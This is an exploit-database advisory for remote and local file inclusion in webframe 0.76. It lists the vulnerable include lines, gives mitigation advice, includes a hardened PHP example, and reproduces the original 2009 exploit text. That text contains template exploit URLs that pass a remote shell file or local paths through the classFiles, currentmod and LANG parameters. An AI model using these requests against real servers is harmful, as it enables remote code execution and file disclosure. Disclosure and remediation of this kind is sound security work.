vendor: webframe
by: ahmadbady
CVSS: 7.5 (HIGH)
CWE: Rfi/Lfi
Product Name: webframe
Affected Version From: 0.76
Affected Version To: 0.76
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

Rfi/Lfi Exploit in webframe 0.76

The webframe 0.76 script is vulnerable to remote and local file inclusion (RFI/LFI). The vulnerable include statements are in /mod/admin/doc/index.php (line 3), /mod/index.php (lines 5, 7, 9, 11, 13) and /mod/base/menu.php (line 17); each builds its include path from a request-controlled variable ($classFiles, $currentmod or $LANG) without any validation, so an attacker can make the server include and execute arbitrary remote or local files.

Mitigation:

The vendor has not provided a patch for this vulnerability. Users are advised to update to a newer version of the webframe script or to implement proper input validation and sanitization, so that include paths are never built from the client-supplied classFiles, currentmod and LANG parameters.
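As an added example (not webframe's own code), the hardened form of the include pattern quoted in the advisory: the class directory becomes a server-side constant, the module name is checked against an allow-list, the language code must match a strict pattern, and the final path is canonicalised and confined to the expected directory. The directory layout /mod/<module>/lang/<LANG>.php follows the advisory; the module list is a placeholder assumption.

```php
<?php
// Hardened replacement for the advisory's
//   include "../$currentmod/lang/$LANG.php";
// where $currentmod and $LANG arrived unvalidated from the request.
declare(strict_types=1);

// The original $classFiles came from the request (register_globals);
// here the class directory is a constant that user input cannot reach.
const CLASS_FILES = __DIR__ . '/classes';

// Allow-list of module names that may be loaded (placeholder values).
const ALLOWED_MODULES = ['base', 'admin'];

/**
 * Build the language-file path for a module, or throw.
 * Rejects unknown modules, remote URLs, traversal and null bytes.
 */
function langFilePath(string $currentmod, string $lang): string
{
    if (!in_array($currentmod, ALLOWED_MODULES, true)) {
        throw new InvalidArgumentException('unknown module');
    }
    // Language codes are short tokens such as "en" or "pt_BR"; anything
    // else ("http://...", "../../etc/passwd", "%00") fails this check.
    if (!preg_match('/^[a-z]{2}(_[A-Z]{2})?$/', $lang)) {
        throw new InvalidArgumentException('bad language code');
    }
    // realpath() collapses any ".." segments, so the prefix check below
    // really does confine the include to the module's lang directory.
    $base = realpath(__DIR__ . '/../' . $currentmod . '/lang');
    $path = $base === false ? false : realpath($base . '/' . $lang . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new InvalidArgumentException('language file not found');
    }
    return $path;
}

// Read the request explicitly instead of relying on register_globals.
$currentmod = (string) ($_GET['currentmod'] ?? 'base');
$lang       = (string) ($_GET['LANG'] ?? 'en');
try {
    include langFilePath($currentmod, $lang);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('invalid request');
}
```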

Exploit-DB raw data:

                          -----------------[-Rfi/Lfi-]-----------------

script:webframe 0.76
   
------------------------------------------------------------------
download from:http://downloads.sourceforge.net/phpwebframe/webframe-0.76-src.tar.gz?modtime=1155546760&big_mirror=0
   
------------------------------------------------------------------

........................................................
vul1: /mod/admin/doc/index.php line 3;

 include_once "$classFiles/xml.php";
==============================================
vul2:/mod/index.php line 5,7,9,11,13;

include_once "$classFiles/table.php";
//html class
include_once "$classFiles/html.php"; 
//Database class
include_once "$classFiles/mysql.php";
//Form class
include_once "$classFiles/form.php";
//Language file
include "../$currentmod/lang/$LANG.php"; ----> = lfi
============================================================
vul3: /mod/base/menu.php line 17;

  include_once "$classFiles/mysql.php";
============================================================
-----------------------------------------------------

xpl rfi:

http://127.0.0.1/path/mod/admin/doc/index.php?classFiles=[shell.txt?]

http://127.0.0.1/path/mod/index.php?classFiles=[shell.txt?]

http://127.0.0.1/path/mod/base/menu.php?classFiles=[shell.txt?]

xpl lfi:

http://127.0.0.1/path/mod/index.php?currentmod=[Lfi]

http://127.0.0.1/path/mod/index.php?LANG=[Lfi]

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-09]